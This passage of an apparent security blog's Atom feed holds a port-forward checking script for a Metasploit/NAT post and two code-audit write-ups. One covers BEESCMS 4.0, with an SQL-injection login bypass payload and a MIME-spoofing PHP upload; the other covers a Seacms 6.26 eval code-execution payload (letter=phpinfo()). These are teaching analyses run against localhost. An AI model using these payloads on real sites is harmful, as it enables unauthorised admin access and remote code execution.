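# post. Not code from the post. PUBLIC_IP is a placeholder (the post's 1.1.1.1).
import functools
import http.client
import os
import socket
import tempfile
import threading
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

PUBLIC_IP = "1.1.1.1"        # placeholder: the public side of the attacking NAT
EXPECTED_BODY = "it works"   # what the post's test.html contains


def check_forward(host, port, path="/test.html", expected=EXPECTED_BODY, timeout=5.0):
    """Fetch path over plain HTTP (the post's SimpleHTTPServer speaks no TLS,
    even on 443) and report whether the forward delivered the expected page."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", path, headers={"Host": host})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", "replace")
        conn.close()
    except (ConnectionRefusedError, socket.timeout) as exc:
        # Refused: nothing listening / no forward rule. Timeout: filtered.
        return {"ok": False, "status": None, "reason": type(exc).__name__}
    except (OSError, http.client.HTTPException) as exc:
        # e.g. a real TLS service answered on 443 instead of our plain server
        return {"ok": False, "status": None, "reason": str(exc)}
    if resp.status != 200:
        return {"ok": False, "status": resp.status, "reason": "unexpected status"}
    if expected not in body:
        # Something else answered on that port (e.g. apache2 still running)
        return {"ok": False, "status": 200, "reason": "wrong page served"}
    return {"ok": True, "status": 200, "reason": "ok"}


class _QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, *args):    # keep the self-check output clean
        pass


def local_selfcheck():
    """Serve a constructed test.html on a loopback port and run check_forward
    against it, once for the real file and once for a missing one."""
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "test.html"), "w") as fh:
        fh.write(EXPECTED_BODY + "\n")
    handler = functools.partial(_QuietHandler, directory=tmp)
    httpd = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    try:
        port = httpd.server_address[1]
        good = check_forward("127.0.0.1", port)
        missing = check_forward("127.0.0.1", port, path="/nope.html")
    finally:
        httpd.shutdown()
        httpd.server_close()
    return good, missing


if __name__ == "__main__":
    # Run from a host outside the attacking LAN, after starting the python
    # web server on Kali, exactly as the post describes.
    for port in (80, 443):
        print(port, check_forward(PUBLIC_IP, port))
```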
<summary type="html">
<h1 id="翻译:Metasploit-Meterpreter-and-NAT"><a href="#翻译:Metasploit-Meterpreter-and-NAT" class="headerlink" title="翻译:Metasploit Meterpreter
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>Getting started with code auditing: BEESCMS 4.0</title>
<link href="http://yoursite.com/2018/12/04/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A8-BEESCMS4.0/"/>
<id>http://yoursite.com/2018/12/04/代码审计入门-BEESCMS4.0/</id>
<published>2018-12-03T16:18:45.000Z</published>
<updated>2020-03-14T15:37:42.549Z</updated>
<content type="html"><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h2><p>BEESCMS is a PHP+MySQL multi-language enterprise website management system: its content modules are easy to extend, template styles are varied, templates are simple to build yet powerful, it offers professional SEO optimisation and a convenient back end, and it is well suited to corporate sites, foreign-trade sites, public institutions, educational bodies and personal sites.<br>This CMS is a good choice for getting started with code auditing.</p><h2 id="后台登陆SQL注入漏洞"><a href="#后台登陆SQL注入漏洞" class="headerlink" title="SQL injection in the back-end login"></a>SQL injection in the back-end login</h2><p>admin\Login.php contains the following code:<br><figure class="highlight plain"><table><tr><td class="code"><pre>// login check
elseif($action=='ck_login'){
    global $submit,$user,$password,$_sys,$code;
    $submit=$_POST['submit'];
    $user=fl_html(fl_value($_POST['user']));
    $password=fl_html(fl_value($_POST['password']));
    $code=$_POST['code'];
    if(!isset($submit)){
        msg('请从登陆页面进入');
    }
    if(empty($user)||empty($password)){
        msg("密码或用户名不能为空");
    }
    if(!empty($_sys['safe_open'])){
        foreach($_sys['safe_open'] as $k=>$v){
            if($v=='3'){
                if($code!=$s_code){msg("验证码不正确!");}
            }
        }
    }
    check_login($user,$password);

}</pre></td></tr></table></figure></p><p>The submitted user and password pass through fl_value and fl_html.<br>fl_value is defined as:<br><figure class="highlight plain"><table><tr><td class="code"><pre>function fl_value($str){
    if(empty($str)){return;}
    return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/i','',$str);
}</pre></td></tr></table></figure></p><p>The function only runs preg_replace once over the keywords, so it can be bypassed by double-writing them.<br>fl_html is mainly there to prevent XSS and is irrelevant here.<br>Further down, check_login does the actual check:<br><figure class="highlight plain"><table><tr><td class="code"><pre>function check_login($user,$password){
    $rel=$GLOBALS['mysql']->fetch_asc("select id,admin_name,admin_password,admin_purview,is_disable from ".DB_PRE."admin where admin_name='".$user."' limit 0,1");
    $rel=empty($rel)?'':$rel[0];
    if(empty($rel)){
        msg('不存在该管理用户','login.php');
    }
    $password=md5($password);
    if($password!=$rel['admin_password']){
        msg("输入的密码不正确");
    }
    if($rel['is_disable']){
        msg('该账号已经被锁定,无法登陆');
    }

    $_SESSION['admin']=$rel['admin_name'];
    $_SESSION['admin_purview']=$rel['admin_purview'];
    $_SESSION['admin_id']=$rel['id'];
    $_SESSION['admin_time']=time();
    $_SESSION['login_in']=1;
    $_SESSION['login_time']=time();
    $ip=fl_value(get_ip());
    $ip=fl_html($ip);
    $_SESSION['admin_ip']=$ip;
    unset($rel);
    header("location:admin.php");
}</pre></td></tr></table></figure></p><p>The function first queries the database for $user, then compares the MD5 of the submitted $password with the $rel['admin_password'] returned by the query; if they match, the login succeeds. So we can construct:<br>user: 0' un/**ion se/**lect 1,1,'202cb962ac59075b964b07152d234b70',1,0;#<br>password: 123 ('202cb962ac59075b964b07152d234b70' is the MD5 of '123')<br>and the login is bypassed:<br><img src="/2018/12/04/代码审计入门-BEESCMS4.0/1.png" alt=""></p><h2 id="任意文件上传漏洞"><a href="#任意文件上传漏洞" class="headerlink" title="Arbitrary file upload"></a>Arbitrary file upload</h2><p>admin/upload.php contains the following code:<br><figure class="highlight plain"><table><tr><td class="code"><pre><?php
if(isset($_FILES['up'])){
    if(is_uploaded_file($_FILES['up']['tmp_name'])){
        if($up_type=='pic'){
            $is_thumb=empty($_POST['thumb'])?0:$_POST['thumb'];
            $thumb_width=empty($_POST['thumb_width'])?$_sys['thump_width']:intval($_POST['thumb_width']);
            $thumb_height=empty($_POST['thumb_height'])?$_sys['thump_height']:intval($_POST['thumb_height']);
            $logo=0;
            $is_up_size = $_sys['upload_size']*1000*1000;
            $value_arr=up_img($_FILES['up'],$is_up_size,array('image/gif','image/jpeg','image/png','image/jpg','image/bmp','image/pjpeg'),$is_thumb,$thumb_width,$thumb_height,$logo);
            $pic=$value_arr['pic'];
            if(!empty($value_arr['thumb'])){
                $pic=$value_arr['thumb'];
            }
            $str="<script type=\"text/javascript\">$(self.parent.document).find('#{$get}').val('{$pic}');self.parent.tb_remove();</script>";
            echo $str;
            exit;
        }// image upload
    }else{
        die('没有上传文件或文件大小超过服务器限制大小<a href="javascript:history.back(1);">返回重新上传</a>');
    }
}
?></pre></td></tr></table></figure></p><p>The uploaded file is handed to up_img, together with a whitelist of allowed upload types. up_img looks like this:<br><figure class="highlight plain"><table><tr><td class="code"><pre>function up_img($file,$size,$type,$thumb=0,$thumb_width='',$thumb_height='',$logo=1,$pic_alt=''){
    if(file_exists(DATA_PATH.'sys_info.php')){include(DATA_PATH.'sys_info.php');}
    if(is_uploaded_file($file['tmp_name'])){
        if($file['size']>$size){
            msg('图片超过'.$size.'大小');
        }
        $pic_name=pathinfo($file['name']);// file info

        $file_type=$file['type'];
        if(!in_array(strtolower($file_type),$type)){
            msg('上传图片格式不正确');
        }
        $path_name="upload/img/";
        $path=CMS_PATH.$path_name;
        if(!file_exists($path)){
            @mkdir($path);
        }
        $up_file_name=empty($pic_alt)?date('YmdHis').rand(1,10000):$pic_alt;
        $up_file_name2=iconv('UTF-8','GBK',$up_file_name);
        $file_name=$path.$up_file_name2.'.'.$pic_name['extension'];

        if(file_exists($file_name)){
            msg('已经存在该图片,请更改图片名称!');// duplicate name check
        }

        $return_name['up_pic_size']=$file['size'];// uploaded file size
        $return_name['up_pic_ext']=$pic_name['extension'];// uploaded file extension
        $return_name['up_pic_name']=$up_file_name;// uploaded file name
        $return_name['up_pic_path']=$path_name;// upload path
        $return_name['up_pic_time']=time();// upload time
        unset($pic_name);
        // start the upload
        if(!move_uploaded_file($file['tmp_name'],$file_name)){
            msg('图片上传失败','',0);
        }
        ...// remaining unrelated code omitted
}</pre></td></tr></table></figure></p><p>The problem is here:<br><figure class="highlight plain"><table><tr><td class="code"><pre>$file_type=$file['type'];
if(!in_array(strtolower($file_type),$type)){
    msg('上传图片格式不正确');
}</pre></td></tr></table></figure></p><p>The type check uses the MIME type sent by the client, which can be changed by intercepting the request with Burp Suite.<br>The file name is built as follows:<br><figure class="highlight plain"><table><tr><td class="code"><pre>$up_file_name=empty($pic_alt)?date('YmdHis').rand(1,10000):$pic_alt;
$up_file_name2=iconv('UTF-8','GBK',$up_file_name);
$file_name=$path.$up_file_name2.'.'.$pic_name['extension'];</pre></td></tr></table></figure></p><p>The extension is taken straight from $pic_name['extension']!!!<br>Although the file name is changed and randomised, it can be recovered by enumeration. Moreover, if you upload a php file through the logo image field in the back end's basic site settings and change the MIME type in the intercepted request, the file name is shown directly.<br><img src="/2018/12/04/代码审计入门-BEESCMS4.0/2.png" alt=""><br><img src="/2018/12/04/代码审计入门-BEESCMS4.0/3.png" alt=""><br>Resulting address: <a href="http://127.0.0.1/upload/img/201812031932133189.php" target="_blank" rel="noopener">http://127.0.0.1/upload/img/201812031932133189.php</a></p>]]></content>
<summary type="html">
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h2><p>BEESCMS Enterprise Website Management System is a multilingual PHP+MySQL system: its content modules are easy to extend, its template styles are varied, template creation is simple yet powerful, with professional SEO optimization, back
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="PHP" scheme="http://yoursite.com/tags/PHP/"/>
<category term="文件上传" scheme="http://yoursite.com/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"/>
<category term="SQL注入" scheme="http://yoursite.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
</entry>
<entry>
<title>Seacms 6.26 Arbitrary Code Execution Vulnerability Analysis</title>
<link href="http://yoursite.com/2018/11/26/Seacms6.26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<id>http://yoursite.com/2018/11/26/Seacms6.26任意代码执行漏洞分析/</id>
<published>2018-11-26T14:57:50.000Z</published>
<updated>2020-03-14T15:37:31.354Z</updated>
<content type="html"><![CDATA[<p>Introduction: Seacms (Haiyang CMS, the Ocean Film and Television Management System) is a video-on-demand system designed for webmasters with different needs. Flexibility, convenience and a simple, user-friendly design are its main features, making it the first choice for quickly setting up a video site; an industry site with a massive amount of video information can be built in just 5 minutes.<br>As a beginner, I am practicing code auditing on this older version.<br>The vulnerability is in search.php:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">require_once("include/common.php");</span><br><span class="line">require_once(sea_INC."/main.class.php");</span><br><span class="line"></span><br><span class="line">$schwhere = '';</span><br><span class="line">foreach($_GET as $k=>$v)</span><br><span class="line">{</span><br><span class="line"> $$k=_RunMagicQuotes(gbutf8(RemoveXSS($v)));</span><br><span class="line">$schwhere.= "&$k=".urlencode($$k);</span><br><span class="line">}</span><br><span class="line">$schwhere = ltrim($schwhere,'&');</span><br><span class="line"></span><br><span class="line">$page = (isset($page) && is_numeric($page)) ? $page : 1;</span><br><span class="line">$searchtype = (isset($searchtype) && is_numeric($searchtype)) ? $searchtype : -1;</span><br><span class="line">$tid = (isset($tid) && is_numeric($tid)) ? intval($tid) : 0;</span><br><span class="line">if(!isset($searchword)) $searchword = '';</span><br><span class="line">$action = $_REQUEST['action'];</span><br><span class="line">$searchword = RemoveXSS(stripslashes($searchword));</span><br><span class="line">$searchword = addslashes(cn_substr($searchword,20));</span><br><span class="line">if($cfg_notallowstr !='' && m_eregi($cfg_notallowstr,$searchword))</span><br><span class="line">{</span><br><span class="line">ShowMsg("你的搜索关键字中存在非法内容,被系统禁止!","index.php","0",$cfg_search_time*1000);</span><br><span class="line">exit();</span><br><span class="line">}</span><br><span class="line">if($searchword==''&&$searchtype!=5)</span><br><span class="line">{</span><br><span class="line">ShowMsg('关键字不能为空!','index.php','0',$cfg_search_time*1000);</span><br><span class="line">exit();</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>The loop on line 5 accepts arbitrary parameter names and values via GET and registers each one as a variable of the same name.</p>
<p>In echoSearchPage():<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;</span><br><span class="line">$order = !empty($order)?$order:time;</span><br><span class="line">if(intval($searchtype)==5)</span><br><span class="line">{</span><br><span class="line">$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";</span><br><span class="line">$typeStr = !empty($tid)?intval($tid).'_':'0_';</span><br><span class="line">$yearStr = !empty($year)?PinYin($year).'_':'0_';</span><br><span class="line">$letterStr = !empty($letter)?$letter.'_':'0_';</span><br><span class="line">$areaStr = !empty($area)?PinYin($area).'_':'0_';</span><br><span class="line">$orderStr = !empty($order)?$order.'_':'0_';</span><br><span class="line">$jqStr = !empty($jq)?$jq.'_':'0_';</span><br><span class="line">$cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;</span><br><span class="line">$pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>Here $area, $year and the other parameters are declared global, and they can be set to arbitrary values in the URL.<br>These values are stored in $cacheName:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">if($cfg_iscache){</span><br><span class="line">if(chkFileCache($cacheName)){</span><br><span class="line">$content = getFileCache($cacheName);</span><br><span class="line">}else{</span><br><span class="line">$content = parseSearchPart($searchTemplatePath);</span><br><span class="line">setFileCache($cacheName,$content);</span><br><span class="line">}</span><br><span class="line">}else{</span><br><span class="line">$content = parseSearchPart($searchTemplatePath);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Here $content is read from the HTML template file.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>Here the user-supplied parameters such as $area are inserted into $content.</p>
<p>In function parseIf($content):<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">if (strpos($content,'{if:')=== false){</span><br><span class="line"> return $content;</span><br><span class="line">}else{</span><br><span class="line">$labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");</span><br><span class="line">$labelRule2="{elseif";</span><br><span class="line">$labelRule3="{else}";</span><br><span class="line">preg_match_all($labelRule,$content,$iar);</span><br><span class="line">$arlen=count($iar[0]);</span><br><span class="line">$elseIfFlag=false;</span><br><span class="line">for($m=0;$m<$arlen;$m++){</span><br><span class="line">$strIf=$iar[1][$m];</span><br><span class="line">$strIf=$this->parseStrIf($strIf);</span><br><span class="line">$strThen=$iar[2][$m];</span><br><span class="line">$strThen=$this->parseSubIf($strThen);</span><br><span class="line">if (strpos($strThen,$labelRule2)===false){</span><br><span class="line">if (strpos($strThen,$labelRule3)>=0){</span><br><span class="line">$elsearray=explode($labelRule3,$strThen);</span><br><span class="line">$strThen1=$elsearray[0];</span><br><span class="line">$strElse1=$elsearray[1];</span><br><span class="line">@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");</span><br><span class="line">if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}</span><br><span class="line">}else{</span><br><span class="line">@eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");</span><br><span class="line">if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>preg_match_all extracts the {if:...} condition that contains the values inserted earlier,<br>and the condition is then executed as PHP code in @eval.</p>
<p>payload: <a href="http://127.0.0.1/haiyang/search.php?searchtype=5&letter=phpinfo()" target="_blank" rel="noopener">http://127.0.0.1/haiyang/search.php?searchtype=5&letter=phpinfo()</a><br>Result:<br><img src="/2018/11/26/Seacms6.26任意代码执行漏洞分析/1.png" alt=""></p>]]></content>
<summary type="html">
<p>Introduction: Seacms (Haiyang CMS, the Ocean Film and Television Management System) is a video-on-demand system designed for webmasters with different needs. Flexibility, convenience and a simple, user-friendly design are its main features, making it the first choice for quickly setting up a video site; an industry site with a massive amount of video information can be built in just 5 minutes.<br>As a beginner, I am practicing code auditing on this older version.<br>
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="PHP" scheme="http://yoursite.com/tags/PHP/"/>
</entry>
</feed>